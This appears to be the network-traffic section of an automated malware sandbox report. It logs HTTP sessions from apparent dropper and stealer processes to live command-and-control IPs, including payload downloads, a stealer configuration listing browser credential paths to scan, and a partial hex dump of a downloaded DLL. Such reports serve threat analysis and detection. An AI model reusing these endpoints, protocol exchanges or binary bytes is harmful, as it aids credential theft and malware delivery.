                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:06.361576080 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:06.613610983 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      60192.168.2.549880193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:06.348500013 CEST183OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 31
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 64 31 3d 31 30 30 30 31 38 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                      Data Ascii: d1=1000187001&unit=246122658369
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:06.594388008 CEST193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 4 <c>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:06.597733974 CEST140OUTGET /lend/build12.exe HTTP/1.1
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      If-Modified-Since: Fri, 19 Apr 2024 00:20:52 GMT
                                                                                                                                                                                                                                      If-None-Match: "6621b8e4-17e00"
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:06.839776039 CEST191INHTTP/1.1 304 Not Modified
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:06 GMT
                                                                                                                                                                                                                                      Last-Modified: Fri, 19 Apr 2024 00:20:52 GMT
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      ETag: "6621b8e4-17e00"


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      61192.168.2.549882193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:07.016180992 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:07.269551039 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      62192.168.2.549883147.185.221.19309465608C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:07.220086098 CEST248OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                                                                                                                                                                                      Host: b-stamps.gl.at.ply.gg:30946
                                                                                                                                                                                                                                      Content-Length: 137
                                                                                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:07.630357981 CEST385OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                                                                                                                                                                                      Host: b-stamps.gl.at.ply.gg:30946
                                                                                                                                                                                                                                      Content-Length: 137
                                                                                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnect xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:19.786227942 CEST359INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 212
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:19 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:20.095185041 CEST359INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 212
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:19 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:24.843379974 CEST231OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                                                                                                                                                                                                      Host: b-stamps.gl.at.ply.gg:30946
                                                                                                                                                                                                                                      Content-Length: 144
                                                                                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:33.719772100 CEST1248INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 4744
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:33 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 4f 62 6a 65 63 74 34 3e 74 72 75 65 3c 2f 61 3a 4f 62 6a 65 63 74 34 3e 3c 61 3a 4f 62 6a 65 63 74 36 3e 66 61 6c 73 65 3c 2f 61 3a 4f 62 6a 65 63 74 36 3e 3c 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 74 72 75 65 3c 2f 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 3c 61 3a 53 63 61 6e 43 68 72 6f 6d 65 42 72 6f 77 73 65 72 73 50 61 74 68 73 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 42 61 74 74 6c 65 2e 6e 65 74 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 68 72 6f 6d 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 28 78 38 36 29 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 4f 70 65 72 61 20 53 6f 66 74 77 61 72 65 5c 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 4d 61 70 6c 65 53 74 75 64 69 6f 5c 43 68 72 6f 6d 65 50 6c 75 73 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 49 72 69 64 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Iridium\User Data</b:string><b:string>%USERPROFIL


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      63192.168.2.549884193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:07.548664093 CEST66OUTGET /enigma/Plugins/clip64.dll HTTP/1.1
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:07.795979977 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:07 GMT
                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                      Content-Length: 112128
                                                                                                                                                                                                                                      Last-Modified: Thu, 01 Feb 2024 16:00:35 GMT
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      ETag: "65bbc023-1b600"
                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 f6 04 b3 63 97 6a e0 63 97 6a e0 63 97 6a e0 38 ff 69 e1 69 97 6a e0 38 ff 6f e1 eb 97 6a e0 38 ff 6e e1 71 97 6a e0 b6 fa 6e e1 6c 97 6a e0 b6 fa 69 e1 72 97 6a e0 b6 fa 6f e1 42 97 6a e0 38 ff 6b e1 64 97 6a e0 63 97 6b e0 02 97 6a e0 f8 f9 63 e1 60 97 6a e0 f8 f9 6a e1 62 97 6a e0 f8 f9 95 e0 62 97 6a e0 f8 f9 68 e1 62 97 6a e0 52 69 63 68 63 97 6a e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 11 bf bb 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 24 01 00 00 9a 00 00 00 00 00 00 ec 66 00 00 00 10 00 00 00 40 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 02 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 20 a1 01 00 9c 00 00 00 bc a1 01 00 50 00 00 00 00 d0 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 d4 14 00 00 f0 8f 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 90 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 36 23 01 00 00 10 00 00 00 24 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 69 00 00 00 40 01 00 00 6a 00 00 00 28 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 1c 17 00 00 00 b0 01 00 00 0c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 d0 01 00 00 02 00 00 00 9e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d4 14 00 00 00 e0 01 00 00 16 00 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$'cjcjcj8iij8oj8nqjnljirjoBj8kdjckjc`jjbjbjhbjRichcjPELe!$f@@ P8(@@L.text6#$ `.rdata4i@j(@@.data@.rsrc@@.reloc@B
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:07.796135902 CEST1289INData Raw: 00 00 6a 20 68 08 8d 01 10 b9 60 b8 01 10 e8 0f 44 00 00 68 e0 2c 01 10 e8 7d 51 00 00 59 c3 cc cc cc 6a 20 68 2c 8d 01 10 b9 78 b8 01 10 e8 ef 43 00 00 68 40 2d 01 10 e8 5d 51 00 00 59 c3 cc cc cc 6a 14 68 50 8d 01 10 b9 90 b8 01 10 e8 cf 43 00
                                                                                                                                                                                                                                      Data Ascii: j h`Dh,}QYj h,xCh@-]QYjhPCh-=QYjhhCh.QYjhCh`.PYjhoCh.PYjhOCh /PYjh/C
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:07.796159029 CEST1289INData Raw: ff ff 50 c7 85 9c fb ff ff 0f 00 00 00 c6 85 88 fb ff ff 00 e8 00 3f 00 00 c6 45 fc 06 8d b5 88 fb ff ff 83 bd 9c fb ff ff 10 8b bd 88 fb ff ff 8b 95 e8 fb ff ff 0f 43 f7 8b 85 ec fb ff ff 8b 8d 98 fb ff ff 2b c2 89 b5 b0 fb ff ff 89 95 ac fb ff
                                                                                                                                                                                                                                      Data Ascii: P?EC+Q;wCCPs VQTDEr+Hr#+QW9H
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:07.796178102 CEST1289INData Raw: a1 50 b9 01 10 41 81 f9 00 10 00 00 72 16 8b 50 fc 83 c1 23 2b c2 83 c0 fc 83 f8 1f 0f 87 ef 00 00 00 8b c2 51 50 e8 f7 43 00 00 83 c4 08 c7 05 60 b9 01 10 00 00 00 00 c7 05 64 b9 01 10 0f 00 00 00 c6 05 50 b9 01 10 00 0f 10 06 0f 11 05 50 b9 01
                                                                                                                                                                                                                                      Data Ascii: PArP#+QPC`dPP~Ff`FFUr(MBrI#+wzRQCEUEEEr(MBrI#+w1RQ;CtuZ
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:07.796195984 CEST1289INData Raw: 00 00 c6 06 00 c7 45 fc 00 00 00 00 0f 57 c0 66 0f d6 45 e4 c7 45 ec 00 00 00 00 68 00 04 00 00 c7 45 d0 01 00 00 00 c7 45 e4 00 00 00 00 c7 45 e8 00 00 00 00 c7 45 ec 00 00 00 00 e8 09 3f 00 00 8b f8 b9 00 01 00 00 83 c8 ff 89 7d e4 83 c4 04 8d
                                                                                                                                                                                                                                      Data Ascii: EWfEEhEEEE?}UUE3EB@|E3M3U_9PvxErEt\xFNU;Ns~AFrDuEuQ
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:07.796216011 CEST1289INData Raw: 00 00 89 4d cc c6 06 00 bb 01 00 00 00 33 ff 89 5d d0 85 c9 0f 8e e4 00 00 00 0f 1f 40 00 c7 45 e4 00 00 00 00 c7 45 e8 0f 00 00 00 c6 45 d4 00 3b c7 0f 82 14 01 00 00 2b c7 b9 02 00 00 00 3b c1 0f 42 c8 83 7d 1c 10 8d 45 08 0f 43 45 08 51 03 c7
                                                                                                                                                                                                                                      Data Ascii: M3]@EEE;+;B}ECEQMP/]EE}jCEjPvNV];sAFrDuEuQ2EUr(MBrI#+wpRQ(9;}}
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:07.796233892 CEST1289INData Raw: 45 fc 00 00 00 00 8d 4d c0 6a 24 68 48 8e 01 10 c7 45 d0 00 00 00 00 c7 45 d4 0f 00 00 00 c6 45 c0 00 e8 ce 2a 00 00 c6 45 fc 01 8b 45 18 85 c0 75 07 33 f6 e9 dc 00 00 00 33 ff 85 c0 0f 84 cd 00 00 00 66 90 c7 45 e8 00 00 00 00 c7 45 ec 0f 00 00
                                                                                                                                                                                                                                      Data Ascii: EMj$hHEEE*EEu33fEEE;u+;B}ECEQMPs*EEePN(EEP7(E0EUr,MBrI#+
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:07.796252012 CEST1289INData Raw: 89 0d 00 00 00 00 59 5f 5e 8b e5 5d c3 e8 ea 68 00 00 cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 20 2b 01 10 64 a1 00 00 00 00 50 83 ec 40 a1 08 b0 01 10 33 c5 89 45 f0 56 50 8d 45 f4 64 a3 00 00 00 00 83 ec 18 c7 45 fc 01 00 00 00 8b cc 89
                                                                                                                                                                                                                                      Data Ascii: Y_^]hUjh +dP@3EVPEdEejhpAA{%EE ePV#EEPD#ME(0EEeP##EjhxAA%Ed0
